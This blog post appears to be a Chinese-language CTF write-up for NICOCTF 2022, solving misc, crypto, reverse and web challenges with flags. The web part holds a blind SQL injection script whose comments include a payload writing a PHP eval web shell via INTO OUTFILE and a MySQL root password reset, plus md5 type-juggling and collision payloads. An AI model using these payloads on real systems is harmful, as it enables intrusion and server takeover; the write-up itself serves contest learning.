Posted Updated Writeup12 minutes read (About 1828 words)

NICOCTF 2022 Writeup (Winter Camp)

Rank

这是什么比赛呢?

举办时间:庚子土(季冬)月 丁巳土觜执日 - 辛丑土(季冬)月 壬午木胃执日

这是由福建师范大学NISA战队x厦门理工大学CodeMonster战队举办的2022 Winter Camp

Misc

Double Happiness

双倍快乐,压缩包伪加密,直接提出图片

img

修改下高度出FLAG,少前好评

img

img

upside down QR

img

拼图出FLAG

WeakPassword

img

结合题意,压缩包pass为nico,解压得

img

使用stegdetect扫出图片为JPHS隐写,break破解密码得123456

Seek后出flag

NICO{GuLf_WeLc0mE_Y0U}

Crypto

Univirginia

img

编码方式:Unescape Unicode Prefix: \u

1
\u0041\u0051\u0045\u0043\u007b\u0037\u0075\u0031\u0061\u005f\u006b\u0067\u005f\u0067\u0070\u0033\u005f\u0068\u0057\u0061\u0069\u004e\u005f\u0074\u0031\u0034\u0074\u007d

工具跑一下即可

img

二次解密使用 Vigenère cipher(维吉尼亚)编码,Key为nico

img

Reverse

re1

简单异或,脚本写一下跑一下

1
2
3
4
a = [74, 64, 77, 75, 87, 91, 73, 64, 79, 67, 65, 73, 88,67, 88, 68, 73, 98, 101, 111, 99, 111, 120, 106, 81]
for i in range(len(a)):
    a[i] ^= 44
    print(chr(a[i]), end="")

re2

一眼看出flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
http://121.37.5.94:8310/lEvEl_4.php?%4e%49%5f%43%4f%5f=try-your-best!
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x7b67616c66
xor [rsp], rax
mov rdi, rsp
xor edx, edx /* 0 */
xor esi, esi /* 0 */
push SYS_open /* 2 */
pop rax
syscall
mov rdi, rax
xor eax, eax /* SYS_read */
mov rdx, 0x101010101010101 /* 32765899414923635 == 0x746869735f6973 */
push rdx
mov rdx, 0x1756968725e6872
xor [rsp], rdx
pop rdx
mov rsi, rsp
syscall
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x7d6d73615f615f
xor [rsp], rax
mov rsi, rsp
push 1
pop rdi
push 0x64
pop rdx
push SYS_write /* 1 */
pop rax
syscall

img

Web

web1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
//author: Elaine
include('./flag.php');
highlight_file(__FILE__);
$admin = 'false';
$guest = 'true';
extract($_GET);
if (md5($admin) == md5($guest)) {
    echo $FLAG;
} else{
    echo "nonono!";
}
?>
nonono!

无脑条件

1
2
Payload: ?admin=240610708&guest=240610708
NICO{Md5&3xtract_1s_S0_ez!}

S^_^Q^_^L

报错注入,sqlmap嗦一下,手工注入就传统报错注入语句稍微改一下即可

img

level ?

关卡目录

1
2
3
4
Level1: http://121.37.5.94:8310/index.php
Level2: http://121.37.5.94:8310/leVe1_two.php
Level3: http://121.37.5.94:8310/LevEl3.php
Level4: http://121.37.5.94:8310/lEvEl_4.php

第一关浮点漏洞

1
http://121.37.5.94:8310/index.php?txw4ever=0.99999999999999999999999

第二关md5的科学计数法漏洞

生成payload即可

1
jitanglailo=0e00506035745

第三关md5碰撞,找两串md5相同内容不相同的Url编码创一下即可

1
arr1=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00b%87%24%8E%A1%E8H%B3y%BF%93%B8U%D2%F0e%1Bih%D3%5CD%2A%0B%FF%21%83%FA%AF-4%CF4%9B%F1%EF%5D%0D%3D%C1%EBE%3A%3B%E8U%7C%3Dm%89%DB%11%B7%BFkr%84.%01h%C0%C3%96%DFr%A5%CF%B4%08%F9%8D%E6a3%22%05%A5%C8%8Be%0F2%A7%96F%0CC%DB%1E%C5%B7f%D0%E6t%EE%E9n%B6G%2A%9B9%A8%FAK%B9i%82%94%E1%FC%F3%A0%5D%B3%7F%C2%23I%FE%9F%C9d%84%B2%F1%03&arr2=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00b%87%24%8E%A1%E8H%B3y%BF%93%B8U%D2%F0e%1BihS%5CD%2A%0B%FF%21%83%FA%AF-4%CF4%9B%F1%EF%5D%0D%3D%C1%EBE%3A%3B%E8%D5%7C%3Dm%89%DB%11%B7%BFkr%84.%01%E8%C0%C3%96%DFr%A5%CF%B4%08%F9%8D%E6a3%22%05%A5%C8%8Be%0F2%A7%16F%0CC%DB%1E%C5%B7f%D0%E6t%EE%E9n%B6G%2A%9B9%A8%FAK%B9i%82%14%E1%FC%F3%A0%5D%B3%7F%C2%23I%FE%9F%C9%E4%84%B2%F1%03

第四关把参数url编码下即可

1
http://121.37.5.94:8310/lEvEl_4.php?%4e%49%5f%43%4f%5f=try-your-best!

最后flag

1
NICO{phP_1s_R3alLy_Go0d!}

SQL_4

img

观察题目,属于布尔盲注,sqlmap无果,写exp跑

先观察题目

admin/admin 返回

img

如果输入注入语句会触发waf

1
/ 用户和密码框分别输入空格

img

这时候写个脚本检测一下看哪些语句被过滤

img

**/#**还可以用,简单用or绕过后返回

1
admin/ | admin or 1=1#

输入后返回不一样的内容,根据内容得知要获取的是 me7eorite 用户的密码

img

直接构造语句一把梭即可

1
length(database())>6

最终exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
import requests
s = requests.Session()
# burp0_url = "http://49.233.105.150:8004/index.php"
url = "http://121.37.5.94:8322/login.php"
flag = ''
proxies = { "http": None, "https": None}
def exp(i):
    # print(i,j)
    payload = f"'union/**/select/**/(mid((select/**/passwd/**/from/**/txw4ever.users/**/limit/**/0,1),1,1)/**/like/**/'{i}'#"
    print(payload)
    #'order/**/by/**/1#
    #select/**/locate('t',database())/**/like/**/1
    #select mid(database(),1,1) like 't';
    #mid((select/**/passwd/**/from/**/txw4ever.users/**/limit/**/1,1),1,1)
    #'union/**/select/**/ascii(mid((select/**/passwd/**/from/**/txw4ever.users/**/where/**/passwd),1,1))#
    #'union/**/select/**/mid((select/**/passwd/**/from/**/txw4ever.users/**/where/**/passwd),1,1)#
    
    #select/**/passwd/**/from/**/txw4ever.users;
    #'(SELECT/**/GROUP_CONCAT(passwd)/**/FROM/**/txw4ever.users/**/like/**/hex('1'))#
    #'(SELECT/**/GROUP_CONCAT(password)/**/FROM/**/testdb.admin/**/like/**/hex('1'))#
    #select/**/mid(database(),1,1)/**/like/**/'t';(SELECT/**/GROUP_CONCAT(passwd)/**/FROM/**/txw4ever.users/**/like/**/hex('1'));
    # 判断数据库长度:||/**/(length(database())>1)# 6位
    # nicoCTF
    # 猜测数据库名字:||/**/ord(substr(database(),1,1))>14#
    # 猜表:||/**/ord(substr(select/**/TABLE_NAME/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=database(),1,1))>10#
    # 猜表:||/**/ord(substr(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name,{i},1))>1#
    # 猜表长度:||/**/length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/REGEXP/**/'nicoCTF'/**/limit/**/1,1))>1
    # 看有几张表:||/**/length(select count(table_name) from information_schema.tables where table_schema in ("nicoCTF"))>1#
    # 看有几张表:||/**/length(select/**/count(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/("nicoCTF"))>1#
    # ||/**/substr((select table_name from information_schema.tables where table_schema in ("nicoCTF") limit 1,1),1,1)>{j}
    # ||/**/ord(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(\"nicoCTF\")/**/limit/**/1,1),{i},1))>{j}#
    # users nico_ctf_user
    # ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/("nicoCTF")/**/&&/**/table_name/**/in/**/("users")/**/limit/**/2,1),{i},1))>={j}
    # ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/("nicoCTF")/**/&&/**/table_name/**/in/**/("nico_ctf_users")/**/limit/**/2,1),{i},1))>={j}
    # password code
    # ||/**/ord(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(\"nicoCTF\")/**/&&/**/table_name/**/in/**/(\"nico_ctf_users\")/**/limit/**/1,1),{i},1))>{j}#
    # ||/**/ord(substr((select/**/password/**/from/**/nicoCTF.users/**/limit 0,1),{i},1))>{j}#
    # ||/**/ord(substr((select/**/username/**/from/**/nicoCTF.nico_ctf_users/**/limit 0,1),{i},1))>{j}#
    # ||/**/ord(substr((select username from nicoCTF.users limit 1,1),{i},1))>{j}#
    # substr((select username from security.users limit 0,1),1,1)='D'
    #    ||/**/ord(substr((select/**/username/**/from/**/nicoCTF.nico_ctf_users/**/limit/**/1,1),{i},1))>{j}#
    # ||/**/select/**/""/**/INTO/**/OUTFILE/**/"/var/html/ice.php"#
    # ||/**/ord(substr((),{i},1))>{j}#
    # ||/**/ord(substr((show/**/global/**/variables/**/in/**/("%datadir%")),{i},1)>{j}#
    # ||/**/ord(substr(show/**/global/**/variables/**/in/**/("%datadir%"),{i},1))>{j}##
    # ||/**/union/**/select/**/1,2,3,4,5,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e/**/into/**/outfile/**/\"/var/www/html/ice.php\"#
    # ||/**/ord(substr((system/**/pwd),{i},1))>{j}#
    # ||/**/ord(substr(),{
    # update/**/user/**/set/**/password=password(\"root\")/**/where/**/user/**/in/**/(\"root\")#
    # me7eorite
    data = {
        "username": "bilala",
        "passwd": payload
    }
    r = s.post(url, data=data, proxies=proxies)
    if "wrong password" in r.text:
        print(r.text)
        return True
    else:
        return False 
list = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','~','!',"@","#","$","%","^","&","*","(",")","_","+","{","}",":","<",">","?",".","/",";","'","[","]","/","*","-","+",'"']
for i in range(len(list)):
    if(exp(list[i])):
        print(1)
for i in range(1,255):
    if(exp(i)):
        print(1)
# for i in range(1, 100):
#     low = 32 
#     high = 127
#     while (low <= high):
#         mid = (low + high)//2
#         if (exp(i, mid)):
#             low = mid + 1
#         else:
#             high = mid - 1
#     flag += chr((low+high+1)//2)
#     print(flag)

[alert]其实最主要的就是二分盲注,闲着无聊随便写了一些别的东西[/alert]

数据库名字

img

当前的表

img

字段

img

密码和用户名

img

img

最终语句

1
select password from nicoCTF.nico_ctf_users limit 0,1;

登录拿flag

img

flag{202cb96_2ac59075b9_64b07152_d234b70}

NICOCTF 2022 Writeup (Winter Camp)

https://iloli.moe/2022/01/06/NICOCTF-2022-Writeup-Winter-Camp/

Author

IceCliffs

Posted on

2022-01-07

Updated on

2024-11-19

Licensed under

#

Like this article? Support the author with

Comments

Follow

Links

Archives

Tags

CTF18
CVEs2
Computer Network2
Crypto1
DN421
HAM5
HackTheBox3
Hacking7
Hardware4
Java Security1
Music1
OS3
Pwn1
Red Team3
Tetris1
WEB31
Web Security4
Writeup13
pwn1
开箱1
随笔10

Catalogue

Categories

Recents

×